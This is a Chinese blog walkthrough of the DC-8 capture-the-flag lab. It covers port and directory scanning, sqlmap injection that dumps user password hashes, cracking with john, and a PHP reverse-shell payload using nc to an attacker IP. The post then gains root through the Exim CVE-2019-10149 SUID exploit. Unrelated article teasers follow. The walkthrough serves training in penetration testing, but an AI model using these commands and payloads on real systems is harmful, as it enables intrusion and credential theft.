news 2026/7/7 21:32:51

DC-8靶机(详细过程)

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
DC-8靶机(详细过程)

攻击机:192.168.10.40

靶机:192.168.10.130

探测内网存活主机

扫描端口

nmap -A -p- -T4 192.168.10.0/24

-A =

-O # 操作系统识别

-sV # 服务与版本探测

-sC # 默认 NSE 脚本

--traceroute

-p-:全端口扫描

-T4: -T决定的是时间控制策略,

  • 探测并发数
  • 超时阈值
  • 重传次数
  • RTT 估算
  • 主机并行度

信息类型

详细内容

IP 地址

192.168.10.130

主机状态

Host is up

(主机在线)

延迟

0.00062s

(极低延迟,表明在本地网络)

网络距离

1 hop

(1 跳,直接连接)

MAC 地址

00:0C:29:4F:04:C6

制造商

VMware

(主机运行在 VMware 虚拟机环境中)

操作系统 (推测)

运行:`Linux 3.X

设备类型

general purpose

(通用设备)

在robots.txt文件中列举出了32个禁止访问的路径。

扫描目录

dirsearch -u "http://192.168.10.130" -e* -i 200

-e*(星号) 的作用是:告诉 dirsearch 使用它配置文件中定义的所有默认扩展名进行测试。

-i 200:只显示200响应码的

访问网页,收集网站信息

Web渗透

访问网页,点击下面三个标签,nid会随着变化,说明这个界面是通过nid号控制的。在数字后面加个双引号,

会报一个数据库错误,很明显这存在SQL注入漏洞。

SQL注入

sqlmap直接跑,三个注入方式:数字注入,报错注入,时间注入。

sqlmap -u 'http://192.168.10.130/?nid=1' --batch

爆破数据库

sqlmap -u 'http://192.168.10.130/?nid=1' --risk=3 --level=5 --dbs

information_schema是系统数据库,d7db是我们要查询的对象

爆破数据表

sqlmap -u 'http://192.168.10.130/?nid=1' --risk=3 --level=5 -D d7db --tables

爆破字段

sqlmap -u 'http://192.168.10.130/?nid=1' --risk=3 --level=5 -D d7db -T users --columns

在字段列表中name和pass两个字段

查看字段内容

sqlmap -u 'http://192.168.10.130/?nid=1' --risk=3 --level=5 -D d7db -T users -C name,pass --dump

得到用户名和加密后的密码

$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

密码破解

把密码放入一个.txt文本中,使用john工具对密码进行解密,破解出一个密码,这个密码是john的,admin的密码没有破解出来。

john/turtle直接登录网站

可用在里面写入一个木马

写入一个木马

随便填入信息之后提交

传入的php代码执行了

可用执行PHP代码就可以开始反弹shell了。

<?php system('nc -e /bin/bash 192.168.10.40 5555');?>

攻击机开始监听

连接成功

执行python代码获取一个交互式的shell。

python -c "import pty;pty.spawn('/bin/bash')"

权限为www

权限提升

查看具有suid提权的文件,在列出的文件中有一个exim4文件,这是个漏洞点( CVE-2019-10149,即 Exim 4.87-4.91 的 "Return of the WIZard" 漏洞 )。

find / -user root -perm -4000 -print 2>/dev/null

searchsploit exim 4搜索相关漏洞,把漏洞的脚本复制下来。

searchsploit的作用:在本地库中快速查找软件已经公开的漏洞利用代码(POC)。

复制脚本

把脚本下载到靶机中

先把脚本放到攻击机中的/var/www/html目录下,随后开启apache服务

在靶机的/tmp目录中下载脚本,其它目录没有下载权限,在列出的权限列表中,当前目录的权限最后一位为t,这个是/tmp目录的安全特性,写入和读取权限:目录的rwx权限允许任何用户/tmp中创建、写入和读取文件。 他也有个限制 :一个用户只能删除或重命名由他自己创建的文件。

给脚本添加权限并执行脚本

成功提权

在/root目录下找到了flag,查看flag。

使用的相关工具:

nmap端口探测

sqlmap 数据库爆破

网站漏洞反弹shell

john密码破解

searchsploit 漏洞利用工具

总结:

端口探测出可使用的端口,以及对应的服务,如果有可访问的网站之后对网站做信息收集,收集网站使用的架构,前端和后端的信息,找到相关搜索框进行测试,SQL语句,XSS,命令注入,文件包含等都可以进行测试,找到响应的漏洞点之后,进行针对性的测试,比如说使用工具,sqlmap,bp,手动注入等。在找到漏洞点后,扩大漏洞的危害,找寻网站的相关漏洞的payload,提权拿root。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/7/7 17:43:40

5分钟搞定多环境网络配置:ZeroOmega智能路由终极指南

5分钟搞定多环境网络配置&#xff1a;ZeroOmega智能路由终极指南 【免费下载链接】ZeroOmega Manage and switch between multiple proxies quickly & easily. 项目地址: https://gitcode.com/gh_mirrors/ze/ZeroOmega 你是否曾经为跨境开发时的网络延迟而烦恼&…

作者头像 李华
网站建设 2026/7/7 20:15:53

如何用5个简单步骤制作超轻量Windows 11系统镜像

如何用5个简单步骤制作超轻量Windows 11系统镜像 【免费下载链接】tiny11builder Scripts to build a trimmed-down Windows 11 image. 项目地址: https://gitcode.com/GitHub_Trending/ti/tiny11builder 还在为Windows 11系统臃肿、运行缓慢而烦恼吗&#xff1f;今天我…

作者头像 李华
网站建设 2026/7/7 17:41:51

机器学习在代码可测试性评估中的应用

机器学习在代码可测试性评估中的应用关键词&#xff1a;机器学习、代码可测试性评估、软件测试、代码质量、模型训练摘要&#xff1a;本文聚焦于机器学习在代码可测试性评估中的应用。首先介绍了代码可测试性评估的背景、目的、预期读者等内容。接着阐述了相关核心概念及联系&a…

作者头像 李华
网站建设 2026/7/7 11:34:20

建立核心骨干与梯队培养体系

建立核心骨干与梯队培养体系&#xff0c;是确保组织可持续发展的战略核心&#xff0c;是企业从“依赖能人”走向“系统致胜”的必经之路。其关键在于从“选、育、用、留”四个维度出发&#xff0c;建立一套系统化的“人才识别与盘点&#xff08;选&#xff09;、多维度赋能&…

作者头像 李华
网站建设 2026/7/7 17:42:13

【Git 操作】 Git Pull/ Merge/ Rebase 冲突处理全景指南:把“未提交改动”安全地和远端最新合在一起

目录标题Git Pull/ Merge/ Rebase 冲突处理全景指南&#xff1a;把“未提交改动”安全地和远端最新合在一起1.1 先把概念说透&#xff1a;pull、merge、rebase 各自到底在干什么1.2 为什么“未提交改动”经常触发两种不同的冲突形态2.1 你想要“形态 B”的三种安全套路2.2 路线…

作者头像 李华